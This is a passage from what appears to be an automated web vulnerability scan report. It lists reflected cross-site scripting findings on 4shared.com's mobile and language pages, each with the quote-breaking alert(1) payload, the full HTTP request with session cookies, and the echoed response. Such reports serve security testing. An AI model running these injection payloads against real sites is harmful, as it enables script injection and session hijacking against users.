Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6BC1AAE839A91BD67907F851E8D3402D.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:38 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m9395b"-alert(1)-"96bc668bd2/android.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.290. http://www.4shared.com/m/android.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/android.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79835'-alert(1)-'f26d4243dd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m79835'-alert(1)-'f26d4243dd4/android.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m79835'-alert(1)-'f26d4243dd4/android.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C573B452800AD2B0FBF703C1885111DB.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:39 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/m79835'-alert(1)-'f26d4243dd4/android.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.291. http://www.4shared.com/m/android.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/android.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97be5'-alert(1)-'a759f0f5550 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/android.jsp97be5'-alert(1)-'a759f0f5550 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/android.jsp97be5'-alert(1)-'a759f0f5550
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A4E6A0042465258B0AF99F795ADF380B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/m/android.jsp97be5'-alert(1)-'a759f0f5550',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.292. http://www.4shared.com/m/android.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/android.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed12"-alert(1)-"ff9a528e7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7086C84FC8FF96049E03701F16AE0CAE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/android.jsp4ed12"-alert(1)-"ff9a528e7d7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.293. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/blackberry.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e206'-alert(1)-'ba25bae47dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m7e206'-alert(1)-'ba25bae47dd/blackberry.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m7e206'-alert(1)-'ba25bae47dd/blackberry.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A9A9ADBFF7803F7EA59FD6518DEEC3F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:41 GMT
Connection: close
Content-Length: 36143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/m7e206'-alert(1)-'ba25bae47dd/blackberry.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.294. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/blackberry.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c39b"-alert(1)-"ba8c575a95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A4F0296C826302157650E9633BE16FD7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.295. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/blackberry.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a6b"-alert(1)-"80db2a41027 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=95403D84C0034F17BA2CB6B67773D206.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/blackberry.jsp69a6b"-alert(1)-"80db2a41027";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.296. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/blackberry.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fccfe'-alert(1)-'b778b993169 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/blackberry.jspfccfe'-alert(1)-'b778b993169 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/blackberry.jspfccfe'-alert(1)-'b778b993169
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4D6133FE6EFA620290766FDC65790507.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
oginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/m/blackberry.jspfccfe'-alert(1)-'b778b993169',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.297. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/symbian.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6ba5"-alert(1)-"f2530800432 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mf6ba5"-alert(1)-"f2530800432/symbian.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /mf6ba5"-alert(1)-"f2530800432/symbian.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=99D8FFB4975C056D9F3C05BF4AC05215.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:39 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf6ba5"-alert(1)-"f2530800432/symbian.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.298. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/symbian.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8f4b'-alert(1)-'98c747c946c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mc8f4b'-alert(1)-'98c747c946c/symbian.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /mc8f4b'-alert(1)-'98c747c946c/symbian.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ADAD26B83A1AFF1AAFBD03A8DDA7FC24.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/mc8f4b'-alert(1)-'98c747c946c/symbian.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.299. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/symbian.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ceb"-alert(1)-"9c67985142f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/symbian.jsp50ceb"-alert(1)-"9c67985142f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/symbian.jsp50ceb"-alert(1)-"9c67985142f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A6C24D0B2E2E5D66858D67429BC70026.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/symbian.jsp50ceb"-alert(1)-"9c67985142f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.300. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/symbian.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b59e'-alert(1)-'c197af62eb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m/symbian.jsp9b59e'-alert(1)-'c197af62eb8 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/symbian.jsp9b59e'-alert(1)-'c197af62eb8
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8AD75E00D24462090749E813E3634DD9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/m/symbian.jsp9b59e'-alert(1)-'c197af62eb8',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.301. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39736"-alert(1)-"1ec01b6de0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F73CC572AF956E9F72337A2529924ADE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.302. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f76'-alert(1)-'8d035ece632 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

